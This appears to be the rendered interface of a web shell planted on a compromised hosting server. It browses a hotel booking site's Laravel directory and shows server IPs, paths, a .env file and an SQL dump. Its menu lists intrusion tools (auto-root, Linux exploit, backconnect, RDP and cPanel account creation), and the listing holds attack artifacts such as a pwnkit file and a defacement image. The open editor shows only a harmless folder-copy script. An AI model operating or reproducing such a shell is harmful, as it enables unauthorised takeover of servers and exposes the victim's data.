Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
asiatechinc /
public_html /
bhrhotelsindia.com /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-x---
bootstrap
[ DIR ]
drwxr-x---
config
[ DIR ]
drwxr-x---
custom
[ DIR ]
drwxr-x---
database
[ DIR ]
drwxr-x---
lang
[ DIR ]
drwxr-x---
modules
[ DIR ]
drwxr-x---
plugins
[ DIR ]
drwxr-x---
public
[ DIR ]
drwxr-x---
resources
[ DIR ]
drwxr-x---
routes
[ DIR ]
drwxr-x---
storage
[ DIR ]
drwxr-x---
tests
[ DIR ]
drwxr-x---
themes
[ DIR ]
drwxr-x---
vendor
[ DIR ]
drwxr-x---
.babelrc
60
B
-rwxr-x---
.editorconfig
276
B
-rwxr-x---
.env
678
B
-rwxr-x---
.gitattributes
190
B
-rwxr-x---
.gitignore
559
B
-rwxr-x---
.mad-root
0
B
-rw-r--r--
7znew.php
0
B
-rw-r--r--
app.zip
79.43
MB
-rwxr-x---
artisan
1.78
KB
-rwxr-x---
changelog.md
544
B
-rwxr-x---
composer.json
3.46
KB
-rwxr-x---
composer.lock
479.75
KB
-rwxr-x---
cyberyemen.jpg
54.58
KB
-rwxr-x---
error_log
768
B
-rwxr-x---
google76848c33309484f7.html
53
B
-rwxr-x---
gulpfile.js
1.49
KB
-rwxr-x---
license.html
8.86
KB
-rwxr-x---
package-lock.json
374.7
KB
-rwxr-x---
package.json
1.09
KB
-rwxr-x---
phpunit.xml
1.18
KB
-rwxr-x---
pwnkit
0
B
-rwxr-xr-x
readme.md
971
B
-rwxr-x---
root.html
0
B
-rw-r--r--
server.php
584
B
-rwxr-x---
test.php
1.67
KB
-rwxr-x---
txets.php
1
B
-rwxr-x---
vistaarahotel_app.sql
1.76
MB
-rwxr-x---
vite.config.js
274
B
-rwxr-x---
yarn.lock
260.81
KB
-rwxr-x---
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test.php
<?php $modules = [ 'boat', 'car', 'tour', 'hotel', 'event', 'flight' ]; $folderNames = [ 'bookingHistory', 'bookingReport', 'booking', 'profile', 'manage' ]; foreach ($modules as $module){ foreach ($folderNames as $folder_name){ $folder = __DIR__.'/themes/BC/'.ucfirst($module).'/Views/frontend'; $destFolder = __DIR__.'\themes\Base\\'.ucfirst($module).'\Views\frontend'; if($folder_name == 'manage') $folder_name.=ucfirst($module); $folder.='/'.$folder_name; echo $folder.PHP_EOL; if(!is_dir($folder)) continue; $destFolder.='\\'.$folder_name; recurse_copy($folder,$destFolder); rrmdir($folder); } } function recurse_copy($src,$dst) { $dir = opendir($src); @mkdir($dst,0777,true); while(false !== ( $file = readdir($dir)) ) { if (( $file != '.' ) && ( $file != '..' )) { if ( is_dir($src . '/' . $file) ) { recurse_copy($src . '/' . $file,$dst . '/' . $file); } else { copy($src . '/' . $file,$dst . '/' . $file); } } } closedir($dir); } function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "." && $object != "..") { if (is_dir($dir. DIRECTORY_SEPARATOR .$object) && !is_link($dir."/".$object)) rrmdir($dir. DIRECTORY_SEPARATOR .$object); else unlink($dir. DIRECTORY_SEPARATOR .$object); } } rmdir($dir); } }
Close